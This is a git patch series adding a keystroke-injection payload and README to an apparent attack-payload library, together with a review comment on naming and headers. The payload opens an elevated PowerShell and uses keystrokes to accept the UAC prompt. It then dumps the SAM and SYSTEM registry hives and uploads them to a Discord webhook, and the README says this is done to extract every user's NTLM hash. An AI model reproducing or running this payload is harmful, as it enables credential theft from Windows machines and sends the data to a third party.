From 15f8f25701bacc1816c1f942268517cf2d14f22b Mon Sep 17 00:00:00 2001
From: Luu <112649910+luu176@users.noreply.github.com>
Date: Wed, 25 Sep 2024 00:18:39 +0200
Subject: [PATCH 1/4] Create payload.txt
---
 .../ntlm_exfiltration/payload.txt | 34 +++++++++++++++++++
 1 file changed, 34 insertions(+)
 create mode 100644 payloads/library/exfiltration/ntlm_exfiltration/payload.txt
diff --git a/payloads/library/exfiltration/ntlm_exfiltration/payload.txt b/payloads/library/exfiltration/ntlm_exfiltration/payload.txt
new file mode 100644
index 0000000..ee2b9d6
--- /dev/null
+++ b/payloads/library/exfiltration/ntlm_exfiltration/payload.txt
@@ -0,0 +1,34 @@
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: luu176
+
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+END_EXTENSION
+
+DEFINE #DISCORD_WEBHOOK_URL DISCORD_WEBHOOK_URL_HERE
+GUI d
+DELAY 1000
+GUI r
+DELAY 1000
+STRINGLN powershell Start-Process powershell -Verb runAs
+DELAY 3000
+LEFTARROW
+ENTER
+DELAY 3000
+STRINGLN C:\Windows\System32\reg save HKLM\SAM sam /y; C:\Windows\System32\reg save HKLM\SYSTEM system /y; Add-Type -AssemblyName "System.Net.Http"; $webhookUrl = "#DISCORD_WEBHOOK_URL"; $client = New-Object System.Net.Http.HttpClient; $fileStream1 = [System.IO.File]::OpenRead("sam"); $fileContent1 = New-Object System.Net.Http.StreamContent($fileStream1); $content1 = New-Object System.Net.Http.MultipartFormDataContent; $content1.Add($fileContent1, "file", "sam"); $client.PostAsync($webhookUrl, $content1).Result; $fileStream1.Close(); $fileStream2 = [System.IO.File]::OpenRead("system"); $fileContent2 = New-Object System.Net.Http.StreamContent($fileStream2); $content2 = New-Object System.Net.Http.MultipartFormDataContent; $content2.Add($fileContent2, "file", "system"); $client.PostAsync($webhookUrl, $content2).Result; $fileStream2.Close()
+DELAY 500
+GUI d
From c898ed7858a76b584333672f2873b219d9f17a56 Mon Sep 17 00:00:00 2001
From: Luu <112649910+luu176@users.noreply.github.com>
Date: Wed, 25 Sep 2024 00:20:06 +0200
Subject: [PATCH 2/4] Create README.md
---
 .../exfiltration/ntlm_exfiltration/README.md | 28 +++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 payloads/library/exfiltration/ntlm_exfiltration/README.md
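Review bot: The header of the new payload.txt carries only `REM VERSION 1.1` and `REM AUTHOR`, so nothing in the file states what the payload does or what it requires, which is the first thing anyone reviewing it in the library needs. If the library's usual header lines apply, it should at least gain `REM Title: SAM and SYSTEM hive export to a Discord webhook`, `REM Target: Windows, interactive session of a local administrator (the UAC consent dialog is answered by the LEFTARROW/ENTER keystrokes)`, and a `REM Description:` line saying that the two `reg save` calls copy the registry hives into the current directory and post them to a third-party service. The description should also correct the naming: `reg save HKLM\SAM` and `reg save HKLM\SYSTEM` export hive files, not an NTLM hash as the directory name `ntlm_exfiltration` and the README title suggest. Separately, `$_OS` is assigned inside the PASSIVE_WINDOWS_DETECT extension but never read in the body, so the detection has no effect on what the payload does; either drop the extension or note in the header that it is informational only.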
diff --git a/payloads/library/exfiltration/ntlm_exfiltration/README.md b/payloads/library/exfiltration/ntlm_exfiltration/README.md
new file mode 100644
index 0000000..acba0c3
--- /dev/null
+++ b/payloads/library/exfiltration/ntlm_exfiltration/README.md
@@ -0,0 +1,28 @@
+# Exfiltrate NTLM Hash - Windows ✅
+
+A script used to exfiltrate the NTLM hash on a Windows machine.
+
+## Description
+
+A script used to capture and exfiltrate the NTLM hash of a Windows machine. It utilizes PowerShell to retrieve the SAM and SYSTEM files, then sends them to a Discord webhook.
+
+### Settings
+
+* Set the Discord webhook URL
+* Ensure the webhook permissions are configured
+
+## Credits
+
+

Luu176

+
+ + + + +
+ + + +
Github +
+
From a81ecd3e6494b7a443e57bec4afa449bed7d8661 Mon Sep 17 00:00:00 2001
From: Luu <112649910+luu176@users.noreply.github.com>
Date: Wed, 25 Sep 2024 00:21:49 +0200
Subject: [PATCH 3/4] Update payload.txt
---
 payloads/library/exfiltration/ntlm_exfiltration/payload.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/payloads/library/exfiltration/ntlm_exfiltration/payload.txt b/payloads/library/exfiltration/ntlm_exfiltration/payload.txt
index ee2b9d6..7204ad5 100644
--- a/payloads/library/exfiltration/ntlm_exfiltration/payload.txt
+++ b/payloads/library/exfiltration/ntlm_exfiltration/payload.txt
@@ -1,6 +1,6 @@
 EXTENSION PASSIVE_WINDOWS_DETECT
 REM VERSION 1.1
- REM AUTHOR: luu176
+ REM AUTHOR: Korben
 DEFINE #MAX_WAIT 150
 DEFINE #CHECK_INTERVAL 20
From 0df301160179eee71ee464e53a9f31e0584952eb Mon Sep 17 00:00:00 2001
From: Luu <112649910+luu176@users.noreply.github.com>
Date: Wed, 25 Sep 2024 00:23:30 +0200
Subject: [PATCH 4/4] Update README.md
---
 payloads/library/exfiltration/ntlm_exfiltration/README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/payloads/library/exfiltration/ntlm_exfiltration/README.md b/payloads/library/exfiltration/ntlm_exfiltration/README.md
index acba0c3..4e31910 100644
--- a/payloads/library/exfiltration/ntlm_exfiltration/README.md
+++ b/payloads/library/exfiltration/ntlm_exfiltration/README.md
@@ -4,7 +4,7 @@ A script used to exfiltrate the NTLM hash on a Windows machine.
 ## Description
-A script used to capture and exfiltrate the NTLM hash of a Windows machine. It utilizes PowerShell to retrieve the SAM and SYSTEM files, then sends them to a Discord webhook.
+A script used to capture and exfiltrate the NTLM hash of a Windows machine. It utilizes PowerShell to retrieve the SAM and SYSTEM files, then sends them to a Discord webhook. These files can than be used to extract the NTLM hash of all users.
 ### Settings